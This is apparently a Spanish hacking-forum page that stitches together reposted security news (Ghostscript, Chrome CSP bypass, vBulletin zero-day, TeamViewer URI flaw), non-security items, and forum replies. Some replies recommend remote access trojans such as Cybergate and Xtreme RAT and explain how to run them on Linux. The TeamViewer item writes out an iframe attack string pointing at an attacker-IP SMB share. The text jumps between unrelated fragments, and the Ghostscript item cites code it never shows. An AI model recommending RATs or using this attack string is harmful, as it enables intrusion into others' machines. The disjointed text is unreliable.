Desafortunadamente, se perdieron un caso límite donde se busca la cadena vacía. Al buscar una cadena vacía, esto se define como un éxito inmediato: no hay nada que buscar, por lo que saltamos directamente al final. Sin embargo, el resultado debe dividirse en los valores previos al partido, coincidentes y posteriores al partido. Desafortunadamente, el código asumió que habíamos mirado al menos una vez y calculamos la longitud del resultado posterior a la coincidencia de manera incorrecta al restar uno de cero, lo que resultó en una vuelta al valor máximo: 4,294,967,295.

Este error es un defecto de corrupción de memoria en donde hay posibilidad de fracaso y sucede todo el tiempo. No es necesario lidiar con guardias de pila, etc., simplemente basta con leer y escribir lo que se quiera en un segmento masivo de memoria. Esto hizo que fuera bastante fácil para alguien que no es un escritor experimentado en exploits explotarlo.

Debido a este subdesbordamiento, esta cadena nunca se había asignado y no ocupaba espacio real, pero tenía una longitud que se extendía a otra memoria. Intentar leer o escribir esa memoria en direcciones aleatorias saldría de los límites de la memoria, de ahí todas las fallas en el fuzzing. Sin embargo, podríamos almacenar la referencia para permitir su uso usando este fragmento de código:

Es importante tomar en cuenta que las vulnerabilidades en Ghostscript son de mayor gravedad, ya que este paquete se usa en muchas aplicaciones populares de procesamiento de PostScript y PDF. Por ejemplo, se llama a Ghostscript al crear miniaturas en el escritorio, al indexar datos en segundo plano y al convertir imágenes.

Para un ataque exitoso, en muchos casos, es suficiente simplemente descargar el archivo de explotación o navegar por el directorio con él en Nautilus.

Las vulnerabilidades en Ghostscript también se pueden explotar a través de controladores de imágenes basados ​​en los paquetes ImageMagick y GraphicsMagick, pasando un archivo JPEG o PNG, que contiene código PostScript en lugar de una imagen (dicho archivo se procesará en Ghostscript, ya que el tipo MIME es reconocido por el contenido, y sin depender de la extensión).

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los casos sobre demandas en contra de la red social «Facebook» son muchas y es que «no podemos entender el porqué» si es una red social donde «todos nuestros datos» son manejados de la «mejor manera» y ahora está siendo demandado «por supuestamente recopilar datos biométricos de usuarios de Instagram» o personas que aparecen en fotos en la plataforma sin su consentimiento (nótese que todo en «» es mero sarcasmo).

En la demanda, presentada el lunes en un tribunal estatal en Redwood City, California, Facebook fue acusado de «recopilar, almacenar y disfrutar» los datos biométricos de más de 100 millones de usuarios de Instagram. Más específicamente, estos datos biométricos se relacionan con la tecnología de reconocimiento facial.

La denuncia afirma que Instagram está utilizando una herramienta de etiquetado facial que utiliza el reconocimiento facial para crear «modelos faciales», que luego se almacenan en las bases de datos de Facebook.

Agrega que Instagram utiliza esta herramienta de forma automática sin obtener el consentimiento del usuario, a pesar de que las personas en las imágenes no tienen cuentas de Instagram y, por lo tanto, no están de acuerdo con los términos de uso.

"Una vez que Facebook captura los datos biométricos protegidos de sus usuarios de Instagram, los usa para aumentar sus capacidades de reconocimiento facial en todos sus productos, incluida la aplicación de Facebook, y comparte esa información entre varias entidades. Facebook hace todo esto sin proporcionar la información requerida. avisos o divulgaciones requeridas por la ley de Illinois ", se lee en la queja.

La práctica viola una ley en el estado de Illinois que prohíbe a las empresas recopilar datos biométricos de personas (como un escaneo de reconocimiento facial) sin su conocimiento.

Por ley, se puede exigir a una empresa que pague $ 1,000 por infracción (o $ 5,000 si se sabe que actuó de manera imprudente o intencional).

Stephanie Otway, portavoz de Facebook, dijo que Instagram no usa el reconocimiento facial de la misma manera que la aplicación de Facebook:

"Esta queja no tiene fundamento. Instagram no utiliza tecnología de reconocimiento facial ".

Facebook ha enfrentado anteriormente litigios derivados de la ley de Illinois, en los cuales Facebook decidió pagar $ 550 millones a los usuarios elegibles de Illinois, así como también manejar los honorarios legales de los demandantes.

«Este caso debe servir como un recordatorio a las empresas para que sepan que los consumidores se preocupan profundamente por sus derechos de privacidad y que, si se les presiona, lucharán por esos derechos hasta la Corte Suprema, entonces hasta que reciban una compensación justa "

La nueva demanda colectiva contra Instagram busca daños y perjuicios para hasta 100 millones de usuarios de Instagram. Según la ley de Illinois, Facebook podría verse obligado a pagar entre 1.000 y 5.000 dólares por infracción.

Y tal como decimos, Facebook ha sido objeto de quejas por el uso del reconocimiento facial desde 2010, cuando la empresa lanzó la función predeterminada para los usuarios. Por supuesto, los usuarios podían apagarlo, pero los expertos en privacidad dijeron que la compañía no obtuvo el consentimiento de los usuarios para usar la tecnología desde el principio.

En 2012, Facebook desactivó la tecnología en Europa después de que los reguladores plantearon preguntas sobre su sistema de consentimiento.

En 2018, Facebook comenzó a explicar de manera más transparente el funcionamiento y la utilidad de su tecnología de reconocimiento facial a los usuarios, dirigiendo a las personas a una página de configuración donde podían desactivarla.

El año pasado, como parte de un acuerdo de $ 5 mil millones con la Comisión Federal de Comercio sobre violaciones a la privacidad, la compañía decidió realizar el reconocimiento facial solo en la plataforma de suscripción, después de años de activación por defecto para todos los usuarios.

Las regulaciones de privacidad llegan en un momento en que el público está cada vez más preocupado por la difusión de poderosas tecnologías de vigilancia como el reconocimiento facial.

Empresas como Amazon y Clearview AI comercializan software de reconocimiento facial a las fuerzas del orden para ayudarles a identificar sospechosos desconocidos.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login muchas gracias, desconocía esta aplicación. Muy útil la verdad. Entonces podré usar SPY NET o recomiendas algo mas actualizado como indicabas anteriormente Cybergate o Xtreme RAT?
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login gracias, lo probaré.

Ademas de Wine te recomiendo RoboLinux es una distribución GNU/Linux basada en Debian y que como peculiaridad permite ejecutar aplicaciones nativas para Windows sin utilizar Wine o Stealth VM para otras distros como Linux Mint, Ubuntu y openSuSE, on Stealth VM podrás estar seguro ejecutando las aplicaciones Windows, ya que al ser una máquina virtual, los problemas de seguridad y virus no afectarán a tu sistema. respecto al RAT puedes empezar con los que te mencione o si te animas puedes ir experimentando con otros, ánimo poco a poco vas llegando a más y descubriendo cosas nuevas.

Saludos.

Si no ha actualizado recientemente su navegador web Chrome, Opera o Edge a la última versión disponible, sería una excelente idea hacerlo lo más rápido posible.

Investigadores de ciberseguridad revelaron el lunes detalles sobre una falla de día cero en los navegadores web basados ​​en Chromium para Windows, Mac y Android que podría haber permitido a los atacantes eludir por completo las reglas de la Política de seguridad de contenido (CSP) desde Chrome 73. Seguimiento como CVE-2020-6519 (calificado con 6.5 en la escala CVSS), el problema se debe a una omisión de CSP que da como resultado la ejecución arbitraria de código malicioso en los sitios web de destino.

Según PerimeterX, algunos de los sitios web más populares, incluidos Facebook, Wells Fargo, Zoom, Gmail, WhatsApp, Investopedia, ESPN, Roblox, Indeed, TikTok, Instagram, Blogger y Quora, eran susceptibles a la omisión de CSP.

Curiosamente, parece que Tencent Security Xuanwu Lab también destacó la misma falla hace más de un año, solo un mes después del lanzamiento de Chrome 73 en marzo de 2019, pero nunca se abordó hasta que PerimeterX informó el problema a principios de marzo.

Después de que se revelaran los hallazgos a Google, el equipo de Chrome emitió una solución para la vulnerabilidad en la actualización de Chrome 84 (versión 84.0.4147.89) que comenzó a implementarse el 14 de julio del mes pasado.

CSP es una capa adicional de seguridad que ayuda a detectar y mitigar ciertos tipos de ataques, incluidos Cross-Site Scripting (XSS) y ataques de inyección de datos. Con las reglas de CSP, un sitio web puede obligar al navegador de la víctima a realizar ciertas comprobaciones del lado del cliente con el objetivo de bloquear scripts específicos que están diseñados para explotar la confianza del navegador en el contenido recibido del servidor.


Dado que CSP es el método principal utilizado por los propietarios de sitios web para hacer cumplir las políticas de seguridad de datos y evitar la ejecución de scripts maliciosos, una omisión de CSP puede poner en riesgo los datos del usuario de manera efectiva.

Esto se logra especificando los dominios que el navegador debe considerar como fuentes válidas de scripts ejecutables, de modo que un navegador compatible con CSP solo ejecute scripts cargados en archivos de origen recibidos de esos dominios permitidos, ignorando todos los demás.

La falla descubierta por Tencent y PerimeterX elude el CSP configurado para un sitio web simplemente pasando un código JavaScript malicioso en la propiedad "src" de un elemento iframe HTML .

Vale la pena señalar que los sitios web como Twitter, Github, LinkedIn, Google Play Store, la página de inicio de sesión de Yahoo, PayPal y Yandex no se encontraron vulnerables, ya que las políticas de CSP se implementaron utilizando un nonce o hash para permitir la ejecución de scripts en línea.

"Tener una vulnerabilidad en el mecanismo de ejecución de CSP de Chrome no significa directamente que los sitios sean violados, ya que los atacantes también deben administrar para obtener el script malicioso llamado desde el sitio (razón por la cual la vulnerabilidad se clasificó como de gravedad media)", dijo PerimeterX. Señaló Gal Weizman.

Si bien se desconocen las implicaciones de la vulnerabilidad, los usuarios deben actualizar sus navegadores a la última versión para protegerse contra la ejecución de dicho código. A los propietarios de sitios web, por su parte, se les recomienda que utilicen las capacidades nonce y hash de CSP para mayor seguridad.

Además de esto, la última actualización de Chrome 84.0.4147.125 para sistemas Windows, Mac y Linux también corrige otras 15 vulnerabilidades de seguridad, 12 de las cuales están calificadas como "altas" y dos "bajas" en gravedad.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un investigador de seguridad reveló hoy públicamente detalles y código de explotación de prueba de concepto para una vulnerabilidad crítica de ejecución remota de código de día cero sin parches que afecta al ampliamente utilizado software de foros de Internet vBulletin que ya está bajo explotación activa en la naturaleza.

vBulletin es un paquete de software de foro de Internet patentado ampliamente utilizado basado en el servidor de base de datos PHP y MySQL que funciona con más de 100.000 sitios web en Internet, incluidos los sitios web y foros de empresas Fortune 500 y Alexa Top 1 millón.

En septiembre del año pasado, un investigador de seguridad anónimo separado reveló públicamente una vulnerabilidad de RCE de día cero en vBulletin , identificada como CVE-2019-16759, y recibió una calificación de gravedad crítica de 9,8, lo que permite a los atacantes ejecutar comandos maliciosos en el servidor remoto sin necesidad de autenticación para iniciar sesión en el foro.

Un día después de la divulgación de CVE-2019-16759, el equipo de vBulletin lanzó parches de seguridad que resolvieron el problema, pero resulta que el parche fue insuficiente para bloquear la explotación de la falla.

Omitir el parche para la falla CVE-2019-16759 RCE

El nuevo día cero, descubierto y publicado públicamente por el investigador de seguridad Amir Etemadieh (Zenofex), es un bypass para CVE-2019-16759. La falla no recibió ningún identificador CVE en el momento en que se publicó esta publicación de blog.

La última vulnerabilidad de día cero debe considerarse un problema grave porque se puede explotar de forma remota y no requiere autenticación. Se puede explotar fácilmente utilizando un código de explotación de un solo comando de una línea que puede resultar en la ejecución remota de código en el último software vBulletin.


Según el investigador, el parche para CVE-2019-16759 no resolvió los problemas presentes en la plantilla "widget_tabbedcontainer_tab_panel", es decir, su capacidad para cargar una plantilla secundaria controlada por el usuario y cargar la plantilla secundaria, toma un valor de un valor nombrado por separado y lo coloca en una variable llamada "widgetConfig", lo que efectivamente permite al investigador omitir el parche para CVE-2019-16759.

El investigador también publicó tres cargas útiles de exploits de prueba de concepto escritas en varios idiomas, incluidos Bash, Python y Ruby.

Los piratas informáticos explotan activamente vBulletin Zero-Day

Poco después del lanzamiento del código de explotación PoC, los piratas informáticos comenzaron a explotar el día cero para apuntar a los sitios vBulletin .

Según el creador de las conferencias de seguridad de DefCon y Black Hat, Jeff Moss, el foro de DefCon también fue atacado con el exploit solo 3 horas después de que se revelara la falla.

"Un nuevo VBulletin Zero Day fue lanzado ayer por @Zenofex que reveló que el parche CVE-2019-16759 estaba incompleto; en tres horas, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login fue atacado, pero estábamos listos para ello. Desactive la representación PHP para ¡protéjase hasta que lo remenden! ", dijo Moss .

Parche oficial de vBulletin y mitigaciones

El equipo de vBulletin respondió inmediatamente a la falla de día cero publicada públicamente y lanzó un nuevo parche de seguridad que deshabilita el módulo PHP en el software vBulletin para solucionar el problema, asegurando a sus usuarios que se eliminará por completo en la versión futura de vBulletin 5.6.4 .

Los mantenedores del foro aconsejaron a los desarrolladores que consideren vulnerables todas las versiones anteriores de vBulletin y actualicen sus sitios para ejecutar vBulletin 5.6.2 lo antes posible. Los desarrolladores pueden consultar Descripción general rápida: Actualización de vBulletin Connect en los foros de soporte para obtener más información sobre la actualización.

Aunque The Hacker News recomienda encarecidamente a los usuarios y desarrolladores que actualicen sus foros a la nueva versión de vBulletin, aquellos que no puedan actualizar de inmediato pueden mitigar el nuevo día cero desactivando los widgets PHP dentro de sus foros, para hacer esto:

- Vaya al panel de control del administrador de vBulletin y haga clic en "Configuración" en el menú de la izquierda, luego en "Opciones" en el menú desplegable.
- Elija "Configuración general" y luego haga clic en "Editar configuración".
- Busque "Deshabilitar PHP, HTML estático y la representación del módulo de anuncios", establezca en "Sí".
Clic en Guardar"

Tenga en cuenta que estos cambios podrían romper algunas funciones, pero mitigarán el problema hasta que planee aplicar los parches de seguridad oficiales.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Xiaomi está celebrando su décimo aniversario durante este mes de agosto. Además de haber anunciado el Redmi K30 Ultra y el Xiaomi Mi 10 Ultra, su mejor teléfono hasta la fecha sin ningún tipo de límites con carga rápida a 120 W y cámara con zoom de 120x, la compañía ha anunciado otros productos como la Xiaomi Mi TV LUX, el Ninebot GoKartPro Lamborghini Edition, el Mi 55W Wireless Charging Stand, el Mi 100W Car Charger y el Mi 20W Smart Tracking Charging Pad.

Xiaomi Mi TV LUX Transparent Edition

La Mi TV LUX es la nueva e innovadora Smart TV de Xiaomi. Cuenta con un panel OLED que es transparente. Así, incluso reproduciendo imágenes es posible ver lo que hay por detrás, dando la impresión de estar viendo una proyección holográfica.


El televisor cuenta con un tamaño de 55 pulgadas, con un panel Full HD de 10 bits de sólo 5,7 mm de espesor y una tasa de refresco de 120 Hz con una reproducción del 93% del espectro de color DCI-P3. Soporta sonido Dolby Atmos, y cuenta con un procesador MediaTek 9650 en su interior, el mismo que usa la TV Master OLED presentada hace unas semanas, con núcleos Cortex A73 y GPU Mali-G52. El tiempo de respuesta es de 1 ms, y cuenta con IA Maxtor para mejorar el procesamiento de imagen. También tiene un puerto HDMI 2.1 preparado para las nuevas consolas.

Cuenta con Android TV como sistema operativo con su capa Patchwall, y puede utilizarse para controlar la domótica del hogar.


Su precio, eso sí, será bastante prohibitivo, ya que costará 49.999 yuanes, unos 6.100 euros al cambio. Estará a la venta a partir del 16 de agosto.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En la actualidad una de las amenazas más importantes que hay en la red es el Phishing. Como sabemos es la técnica que utilizan los piratas informáticos para robar nuestras credenciales y contraseñas. Básicamente se basa en engañar al usuario al hacerle creer que está ante un enlace legítimo, ante una página oficial donde puede poner sus datos sin peligro. Sin embargo cuando la víctima cae en el anzuelo e introduce su información termina en un servidor controlado por los atacantes. Hoy nos hacemos eco de cómo Microsoft va a permitir que las empresas se entrenen frente a estos ataques de suplantación de identidad.

Microsoft permite simular ataques Phishing

Si hablamos de cuál es la mejor barrera para protegernos del Phishing podemos decir que el sentido común. Evitar cometer errores típicos cuando recibimos este tipo de correos va a ser fundamental. Esto hace que debamos estar preparados y tener los conocimientos adecuados.

En este sentido Microsoft va a poner su granito de arena para que los usuarios estén más capacitados para poder reconocer cuándo un e-mail puede ser fraudulento. Va a permitir que las empresas lleven a cabo ataques Phishing simulados para formar precisamente a los usuarios y evitar que cuando se enfrenten a un ataque de este tipo real, estén preparados.

Esto va a ser posible en Office 365. Es cierto que los proveedores de correo electrónico cada vez están más preparados para bloquear automáticamente aquellos e-mails que contengan enlaces o archivos maliciosos. Pero la realidad es que siguen llegando a la bandeja de entrada. A fin de cuentas los ciberdelincuentes también perfeccionan sus técnicas para lograrlo.

Los administradores de Office 365 van a poder enviar correos seleccionados a los usuarios para entrenarles frente al Phishing. La idea es, como decimos, que estén preparados para saber detectar cuándo es realmente una amenaza. De esta forma podrán hacer frente a intentos de ataques de suplantación de identidad, algo que está muy presente en las empresas y sus empleados.


Attack Simulator, la herramienta para entrenar a los usuarios

Esta nueva función que estará disponible en Office 365 se la conoce como Attack Simulator. Básicamente consiste en lo que hemos comentado: llevar a cabo ataques Phishing simulados y orientados a los usuarios. Van a ser variados y tienen la misión de entrenar a posibles víctimas futuras para que nunca lleguen a serlo.

Desde Microsoft indican que esta nueva función estará disponible próximamente a nivel global. Se espera que sea en unos meses.

Hay que tener en cuenta que el correo electrónico sigue siendo la principal entrada de malware que puede poner en riesgo la seguridad de los usuarios. Es por ello que debemos prestar mucha atención siempre a cualquier mensaje que recibamos por Internet. El objetivo es evitar ser víctimas de ataques que puedan poner en riesgo nuestra privacidad y afectar a los dispositivos.


Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Pues:

Con Wine y otros se pueden ejecutar la mayoría de RATs  de windows en linux, deberías experimentar un poco más.

Saludos!!

Hola:

1. Si el equipo es nuevo has valer la respectiva garantía

2. Si no y te toca lidiar por tu cuenta revisa si el equipo utiliza cmos, de ser así puede ser que solo necesite cambio de batería

3. Actualiza el bios

4. Te recomiendo instales Windows 10 Home 64 bits

Adjunto el respectivo enlace de la pagina oficial del fabricante para que puedas descargar los respectivos drivers así como actualizaciones para tu portátil,  espero sea de ayuda.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

Intenta con Cybergate o Xtreme RAT este es del mismo creador de SpyNet y en los dos la configuración es similar a SpyNet.

Saludos.

Son muchas las herramientas que tenemos para conectarnos de forma remota a otro equipo. En los tiempos en los que vivimos esto es algo muy habitual y a lo que recurren muchos usuarios. Si hablamos de un programa muy popular ese es TeamViewer. En este artículo nos hacemos eco de un problema que afecta a este software y que pone en riesgo a los usuarios que lo utilizan. Este fallo permitiría a un atacante acceder a un ordenador.

Un fallo en TeamViewer permite el acceso de intrusos

Como decimos, TeamViewer es una importante herramienta que permite el acceso remoto a equipos en la red. Esta vez la noticia es que cuenta con una vulnerabilidad que pone en riesgo la seguridad de los usuarios. Permitiría que un posible intruso accediera a ese ordenador sin dejar rastro y poder llevar a cabo diferentes tipos de ataques.

Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores. Eso es lo que ha ocurrido en este caso.

Desde TeamViewer se han apresurado en lanzar un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad.

Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo.

Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras de URI similares.

Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en 'teamviewer10: –play \ attacker-IP share You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.


Acceder sin necesidad de contraseña

Hay que tener en cuenta también que un posible atacante no necesitaría conocer la contraseña del usuario. Podrían ser autenticados de forma automática y lograr así acceso.

Desde TeamViewer indicaron que este problema afectaba a varias versiones de esta herramienta para Windows. Concretamente afecta a las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3. Sin embargo ya han lanzado el parche para todas ellas.

Como hemos mencionado, el trabajo en remoto se ha convertido en algo muy presente en nuestro día a día. Os dejamos algunos consejos para teletrabajar con seguridad.

Vía: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login